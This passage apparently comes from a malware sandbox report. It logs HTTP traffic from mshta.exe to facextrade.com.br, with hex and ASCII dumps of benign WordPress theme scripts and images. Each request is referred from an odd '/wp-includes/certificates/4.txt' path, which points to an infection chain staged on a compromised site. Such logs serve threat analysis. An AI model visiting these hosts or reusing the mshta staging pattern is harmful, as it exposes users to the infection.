                                        Data Raw: 2f 2a 0a 20 2a 20 50 6c 61 79 6c 69 73 74 20 4f 62 6a 65 63 74 20 66 6f 72 20 74 68 65 20 6a 50 6c 61 79 65 72 20 50 6c 75 67 69 6e 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 70 6c 61 79 65 72 2e 6f 72 67 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 39 20 2d 20 32 30 31 33 20 48 61 70 70 79 77 6f 72 6d 20 4c 74 64 0a 20 2a 20 44 75 61 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 61 6e 64 20 47 50 4c 20 6c 69 63 65 6e 73 65 73 2e 0a 20 2a 20 20 2d 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 6d 69 74 2d 6c 69 63 65 6e 73 65 2e 70 68 70 0a 20 2a 20 20 2d 20 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6e 75 2e 6f 72 67 2f 63 6f 70 79 6c 65 66 74 2f 67 70 6c 2e 68 74 6d 6c 0a 20 2a 0a 20 2a 20 41 75 74 68 6f 72 3a 20 4d 61 72 6b 20 4a 20 50 61 6e 61 67 68 69 73 74 6f 6e 0a 20 2a 20 56 65 72 73 69 6f 6e 3a 20 32 2e 33 2e 30 0a 20 2a 20 44 61 74 65 3a 20 32 30 74 68 20 41 70 72 69 6c 20 32 30 31 33 0a 20 2a 0a 20 2a 20 52 65 71 75 69 72 65 73 3a 0a 20 2a 20 20 2d 20 6a 51 75 65 72 79 20 31 2e 37 2e 30 2b 0a 20 2a 20 20 2d 20 6a 50 6c 61 79 65 72 20 32 2e 33 2e 30 2b 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 62 2c 66 29 7b 6a 50 6c 61 79 65 72 50 6c 61 79 6c 69 73 74 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 64 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 63 75 72 72 65 6e 74 3d 30 3b 74 68 69 73 2e 72 65 6d 6f 76 69 6e 67 3d 74 68 69 73 2e 73 68 75 66 66 6c 65 64 3d 74 68 69 73 2e 6c 6f 6f 70 3d 21 31 3b 74 68 69 73 2e 63 73 73 53 65 6c 65 63 74 6f 72 3d 62 2e 65 78 74 65 6e 64 28 7b 7d 2c 74 68 69 73 2e 5f 63 73 73 53 65 6c 65 63 74 6f 72 2c 61 29 3b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 62 2e 65 78 74 65 6e 64 28 21 30 2c 7b 6b 65 79 42 69 6e 64 69 6e 67 73 3a 7b 6e 65 78 74 3a 7b 6b 65 79 3a 33 39 2c 66 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 6e 65 78 74 28 29 7d 7d 2c 70 72 65 76 69 6f 75 73 3a 7b 6b 65 79 3a 33 37 2c 66 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 70 72 65 76 69 6f 75 73 28 29 7d 7d 7d 7d 2c 74 68 69 73 2e 5f 6f 70 74 69 6f 6e 73 2c 64 29 3b 74 68 69 73 2e 70 6c 61 79 6c 69 73 74 3d 5b 5d 3b 74 68 69 73 2e 6f 72 69 67 69 6e 61 6c 3d 5b 5d 3b 74 68 69 73 2e 5f 69 6e 69 74 50 6c 61 79 6c 69 73 74 28 63 29 3b 74 68 69 73 2e 63 73 73 53 65 6c 65 63 74 6f 72 2e 74 69 74 6c 65 3d 74 68 69 73 2e 63 73 73 53 65 6c 65 63 74 6f 72 2e 63 73 73 53 65 6c 65 63 74 6f 72 41 6e 63 65 73 74 6f 72 2b 22 20 2e 6a 70 2d 74 69 74 6c 65 22 3b 74 68 69 73 2e 63 73 73 53 65 6c 65 63 74 6f 72 2e 70 6c 61 79 6c 69 73 74 3d 74 68 69 73 2e 63 73 73 53 65 6c 65 63 74 6f 72 2e 63 73 73 53 65 6c 65 63 74 6f 72 41 6e 63 65 73 74 6f 72 2b 22 20 2e 6a 70 2d 70 6c 61 79 6c 69 73 74 22 3b 0a 74 68 69 73 2e 63 73 73 53 65 6c 65 63 74 6f 72 2e 6e 65 78 74 3d 74 68 69 73 2e 63 73 73 53 65 6c 65 63 74 6f 72 2e 63 73 73 53 65 6c 65 63 74 6f 72 41 6e 63 65 73 74
                                        Data Ascii: /* * Playlist Object for the jPlayer Plugin * http://www.jplayer.org * * Copyright (c) 2009 - 2013 Happyworm Ltd * Dual licensed under the MIT and GPL licenses. * - http://www.opensource.org/licenses/mit-license.php * - http://www.gnu.org/copyleft/gpl.html * * Author: Mark J Panaghiston * Version: 2.3.0 * Date: 20th April 2013 * * Requires: * - jQuery 1.7.0+ * - jPlayer 2.3.0+ */(function(b,f){jPlayerPlaylist=function(a,c,d){var e=this;this.current=0;this.removing=this.shuffled=this.loop=!1;this.cssSelector=b.extend({},this._cssSelector,a);this.options=b.extend(!0,{keyBindings:{next:{key:39,fn:function(){e.next()}},previous:{key:37,fn:function(){e.previous()}}}},this._options,d);this.playlist=[];this.original=[];this._initPlaylist(c);this.cssSelector.title=this.cssSelector.cssSelectorAncestor+" .jp-title";this.cssSelector.playlist=this.cssSelector.cssSelectorAncestor+" .jp-playlist";this.cssSelector.next=this.cssSelector.cssSelectorAncest
                                        Aug 16, 2022 10:49:06.887039900 CEST2577OUTGET /wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:07.099442005 CEST2582INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:19 GMT
                                        Server: Apache
                                        ETag: "a534b6-ada-58592d488ae40"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:21 GMT
                                        Content-Length: 2778
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15362852 18492610
                                        Age: 47
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2a 21 20 64 65 76 69 63 65 2e 6a 73 20 30 2e 31 2e 35 38 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 3b 61 3d 77 69 6e 64 6f 77 2e 64 65 76 69 63 65 2c 77 69 6e 64 6f 77 2e 64 65 76 69 63 65 3d 7b 7d 2c 63 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 6a 3d 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 64 65 76 69 63 65 2e 69 6f 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 28 29 7c 7c 64 65 76 69 63 65 2e 69 70 6f 64 28 29 7c 7c 64 65 76 69 63 65 2e 69 70 61 64 28 29 7d 2c 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 28 22 69 70 68 6f 6e 65 22 29 7d 2c 64 65 76 69 63 65 2e 69 70 6f 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 28 22 69 70 6f 64 22 29 7d 2c 64 65 76 69 63 65 2e 69 70 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 28 22 69 70 61 64 22 29 7d 2c 64 65 76 69 63 65 2e 61 6e 64 72 6f 69 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 28 22 61 6e 64 72 6f 69 64 22 29 7d 2c 64 65 76 69 63 65 2e 61 6e 64 72 6f 69 64 50 68 6f 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 65 76 69 63 65 2e 61 6e 64 72 6f 69 64 28 29 26 26 64 28 22 6d 6f 62 69 6c 65 22 29 7d 2c 64 65 76 69 63 65 2e 61 6e 64 72 6f 69 64 54 61 62 6c 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 65 76 69 63 65 2e 61 6e 64 72 6f 69 64 28 29 26 26 21 64 28 22 6d 6f 62 69 6c 65 22 29 7d 2c 64 65 76 69 63 65 2e 62 6c 61 63 6b 62 65 72 72 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 28 22 62 6c 61 63 6b 62 65 72 72 79 22 29 7c 7c 64 28 22 62 62 31 30 22 29 7c 7c 64 28 22 72 69 6d 22 29 7d 2c 64 65 76 69 63 65 2e 62 6c 61 63 6b 62 65 72 72 79 50 68 6f 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 65 76 69 63 65 2e 62 6c 61 63 6b 62 65 72 72 79 28 29 26 26 21 64 28 22 74 61 62 6c 65 74 22 29 7d 2c 64 65 76 69 63 65 2e 62 6c 61 63 6b 62 65 72 72 79 54 61 62 6c 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 65 76 69 63 65 2e 62 6c 61 63 6b 62 65 72 72 79 28 29 26 26 64 28 22 74 61 62 6c 65 74 22 29 7d 2c 64 65 76 69 63 65 2e 77 69 6e 64 6f 77 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 28 22 77 69 6e 64 6f 77 73 22 29 7d 2c 64 65 76 69 63 65 2e 77 69 6e 64 6f 77 73 50 68 6f 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 65 76 69 63 65 2e 77 69 6e 64 6f 77 73 28 29 26 26 64 28 22 70 68 6f 6e 65 22 29 7d 2c 64 65 76 69 63 65 2e 77 69 6e 64 6f 77 73 54 61 62 6c 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 65 76 69 63 65 2e 77 69 6e 64 6f 77 73 28 29 26 26 64 28 22 74 6f 75 63 68 22 29 7d 2c 64 65 76 69 63
                                        Data Ascii: /*! device.js 0.1.58 */(function(){var a,b,c,d,e,f,g,h,i,j;a=window.device,window.device={},c=window.document.documentElement,j=window.navigator.userAgent.toLowerCase(),device.ios=function(){return device.iphone()||device.ipod()||device.ipad()},device.iphone=function(){return d("iphone")},device.ipod=function(){return d("ipod")},device.ipad=function(){return d("ipad")},device.android=function(){return d("android")},device.androidPhone=function(){return device.android()&&d("mobile")},device.androidTablet=function(){return device.android()&&!d("mobile")},device.blackberry=function(){return d("blackberry")||d("bb10")||d("rim")},device.blackberryPhone=function(){return device.blackberry()&&!d("tablet")},device.blackberryTablet=function(){return device.blackberry()&&d("tablet")},device.windows=function(){return d("windows")},device.windowsPhone=function(){return device.windows()&&d("phone")},device.windowsTablet=function(){return device.windows()&&d("touch")},devic
                                        Aug 16, 2022 10:49:07.103681087 CEST2584OUTGET /wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:07.323434114 CEST2598INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:20 GMT
                                        Server: Apache
                                        ETag: "a534af-99ea-58592d497f080"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:22 GMT
                                        Content-Length: 39402
                                        Content-Type: application/x-javascript
                                        X-Pad: avoid browser bug
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15362853 18492612
                                        Age: 47
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2f 20 43 61 6d 65 72 61 20 73 6c 69 64 65 73 68 6f 77 20 76 31 2e 33 2e 34 20 2d 20 61 20 6a 51 75 65 72 79 20 73 6c 69 64 65 73 68 6f 77 20 77 69 74 68 20 6d 61 6e 79 20 65 66 66 65 63 74 73 2c 20 74 72 61 6e 73 69 74 69 6f 6e 73 2c 20 65 61 73 79 20 74 6f 20 63 75 73 74 6f 6d 69 7a 65 2c 20 75 73 69 6e 67 20 63 61 6e 76 61 73 20 61 6e 64 20 6d 6f 62 69 6c 65 20 72 65 61 64 79 2c 20 62 61 73 65 64 20 6f 6e 20 6a 51 75 65 72 79 20 31 2e 34 2b 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 32 20 62 79 20 4d 61 6e 75 65 6c 20 4d 61 73 69 61 20 2d 20 77 77 77 2e 70 69 78 65 64 65 6c 69 63 2e 63 6f 6d 0a 2f 2f 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 6d 69 74 2d 6c 69 63 65 6e 73 65 2e 70 68 70 0a 3b 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 66 6e 2e 63 61 6d 65 72 61 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 6d 61 74 63 68 28 2f 41 6e 64 72 6f 69 64 2f 69 29 7c 7c 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 6d 61 74 63 68 28 2f 77 65 62 4f 53 2f 69 29 7c 7c 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 6d 61 74 63 68 28 2f 69 50 61 64 2f 69 29 7c 7c 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 6d 61 74 63 68 28 2f 69 50 68 6f 6e 65 2f 69 29 7c 7c 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 6d 61 74 63 68 28 2f 69 50 6f 64 2f 69 29 29 7b 72 65 74 75 72 6e 20 74 72 75 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 48 28 29 7b 76 61 72 20 62 3d 61 28 73 29 2e 77 69 64 74 68 28 29 3b 61 28 22 6c 69 22 2c 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 63 61 6d 65 72 61 5f 76 69 73 54 68 75 6d 62 22 29 3b 61 28 22 6c 69 22 2c 73 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 61 28 74 68 69 73 29 2e 70 6f 73 69 74 69 6f 6e 28 29 2c 64 3d 61 28 22 75 6c 22 2c 73 29 2e 6f 75 74 65 72 57 69 64 74 68 28 29 2c 65 3d 61 28 22 75 6c 22 2c 73 29 2e 6f 66 66 73 65 74 28 29 2e 6c 65 66 74 2c 66 3d 61 28 22 3e 20 64 69 76 22 2c 73 29 2e 6f 66 66 73 65 74 28 29 2e 6c 65 66 74 2c 67 3d 66 2d 65 3b 69 66 28 67 3e 30 29 7b 61 28 22 2e 63 61 6d 65 72 61 5f 70 72 65 76 54 68 75 6d 62 73 22 2c 56 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 68 69 64 65 4e 61 76 22 29 7d 65 6c 73 65 7b 61 28 22 2e 63 61 6d 65 72 61 5f 70 72 65 76 54 68 75 6d 62 73 22 2c 56 29 2e 61 64 64 43 6c 61 73 73 28 22 68 69 64 65 4e 61 76 22 29 7d 69 66 28 64 2d 67 3e 62 29 7b 61 28 22 2e 63 61 6d 65 72 61 5f 6e 65 78 74 54 68 75 6d 62 73 22 2c 56 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 68 69 64 65 4e 61 76 22 29 7d 65 6c 73 65 7b 61 28 22 2e 63 61 6d 65 72 61 5f 6e 65 78 74
                                        Data Ascii: // Camera slideshow v1.3.4 - a jQuery slideshow with many effects, transitions, easy to customize, using canvas and mobile ready, based on jQuery 1.4+// Copyright (c) 2012 by Manuel Masia - www.pixedelic.com// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php;(function(a){a.fn.camera=function(b,c){function e(){if(navigator.userAgent.match(/Android/i)||navigator.userAgent.match(/webOS/i)||navigator.userAgent.match(/iPad/i)||navigator.userAgent.match(/iPhone/i)||navigator.userAgent.match(/iPod/i)){return true}}function H(){var b=a(s).width();a("li",s).removeClass("camera_visThumb");a("li",s).each(function(){var c=a(this).position(),d=a("ul",s).outerWidth(),e=a("ul",s).offset().left,f=a("> div",s).offset().left,g=f-e;if(g>0){a(".camera_prevThumbs",V).removeClass("hideNav")}else{a(".camera_prevThumbs",V).addClass("hideNav")}if(d-g>b){a(".camera_nextThumbs",V).removeClass("hideNav")}else{a(".camera_next
                                        Aug 16, 2022 10:49:07.329015017 CEST2638OUTGET /wp-content/themes/CherryFramework/images/up-arrow.png HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:07.544260979 CEST2641INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:46:12 GMT
                                        Server: Apache
                                        ETag: "a530bd-55a-58592d41dde80"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:14 GMT
                                        Content-Length: 1370
                                        Content-Type: image/png
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15362854 21187616
                                        Age: 175
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1f 00 00 00 13 08 06 00 00 00 68 6c d6 42 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 b5 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f 30 32 2f 30 36 2d 31 34 3a 35 36 3a 32 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d 73 79 6e 74 61 78 2d 6e 73 23 22 3e 20 3c 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 20 72 64 66 3a 61 62 6f 75 74 3d 22 22 20 78 6d 6c 6e 73 3a 78 6d 70 52 69 67 68 74 73 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 72 69 67 68 74 73 2f 22 20 78 6d 6c 6e 73 3a 78 6d 70 4d 4d 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 6d 6d 2f 22 20 78 6d 6c 6e 73 3a 73 74 52 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 73 54 79 70 65 2f 52 65 73 6f 75 72 63 65 52 65 66 23 22 20 78 6d 6c 6e 73 3a 78 6d 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 20 78 6d 70 52 69 67 68 74 73 3a 4d 61 72 6b 65 64 3d 22 46 61 6c 73 65 22 20 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 30 32 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 44 42 42 46 35 30 30 30 31 44 36 32 42 38 31 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 36 34 37 30 31 37 46 45 33 37 43 36 31 31 45 32 42 39 31 43 44 35 36 32 43 35 37 38 38 45 34 45 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 36 34 37 30 31 37 46 44 33 37 43 36 31 31 45 32 42 39 31 43 44 35 36 32 43 35 37 38 38 45 34 45 22 20 78 6d 70 3a 43 72 65 61 74 6f 72 54 6f 6f 6c 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 34 32 36 35 30 38 39 42 33 46 32 46 45 32 31 31 41 43 37 43 44 38 37 38 36 31 45 35 36 43 37 45 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 30 32 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 44 42 42 46 35 30 30 30 31 44 36 32 42 38 31 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66
                                        Data Ascii: PNGIHDRhlBtEXtSoftwareAdobe ImageReadyqe<iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="xmp.did:02801174072068118DBBF50001D62B81" xmpMM:DocumentID="xmp.did:647017FE37C611E2B91CD562C5788E4E" xmpMM:InstanceID="xmp.iid:647017FD37C611E2B91CD562C5788E4E" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4265089B3F2FE211AC7CD87861E56C7E" stRef:documentID="xmp.did:02801174072068118DBBF50001D62B81"/> </rdf:Description> </rdf


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        26192.168.2.2249203187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:49:03.655607939 CEST1440OUTGET /wp-content/themes/theme51253/images/content_bg4.jpg HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:03.883477926 CEST1456INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:46:07 GMT
                                        Server: Apache
                                        ETag: "a53864-d9abf-58592d61568c0"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:47 GMT
                                        Content-Length: 891583
                                        Content-Type: image/jpeg
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 23795440 20835412
                                        Age: 176
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: ff d8 ff e1 0d 82 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1c 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 8e 87 69 00 04 00 00 00 01 00 00 00 a4 00 00 00 d0 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 35 20 57 69 6e 64 6f 77 73 00 32 30 31 34 3a 30 39 3a 30 39 20 31 31 3a 32 39 3a 34 39 00 00 00 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 08 a0 a0 03 00 04 00 00 00 01 00 00 04 7e 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 1e 01 1b 00 05 00 00 00 01 00 00 01 26 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 2e 02 02 00 04 00 00 00 01 00 00 0c 4c 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff ed 00 0c 41 64 6f 62 65 5f 43 4d 00 01 ff ee 00 0e 41 64 6f 62 65 00 64 80 00 00 00 01 ff db 00 84 00 0c 08 08 08 09 08 0c 09 09 0c 11 0b 0a 0b 11 15 0f 0c 0c 0f 15 18 13 13 15 13 13 18 11 0c 0c 0c 0c 0c 0c 11 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 0d 0b 0b 0d 0e 0d 10 0e 0e 10 14 0e 0e 0e 14 14 0e 0e 0e 0e 14 11 0c 0c 0c 0c 0c 11 11 0c 0c 0c 0c 0c 0c 11 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 53 00 a0 03 01 22 00 02 11 01 03 11 01 ff dd 00 04 00 0a ff c4 01 3f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 03 00 01 02 04 05 06 07 08 09 0a 0b 01 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 01 00 02 03 04 05 06 07 08 09 0a 0b 10 00 01 04 01 03 02 04 02 05 07 06 08 05 03 0c 33 01 00 02 11 03 04 21 12 31 05 41 51 61 13 22 71 81 32 06 14 91 a1 b1 42 23 24 15 52 c1 62 33 34 72 82 d1 43 07 25 92 53 f0 e1 f1 63 73 35 16 a2 b2 83 26 44 93 54 64 45 c2 a3 74 36 17 d2 55 e2 65 f2 b3 84 c3 d3 75 e3 f3 46 27 94 a4 85 b4 95 c4 d4 e4 f4 a5 b5 c5 d5 e5 f5 56 66 76 86 96 a6 b6 c6 d6 e6 f6 37 47 57 67 77 87 97 a7 b7 c7 d7 e7 f7 11 00 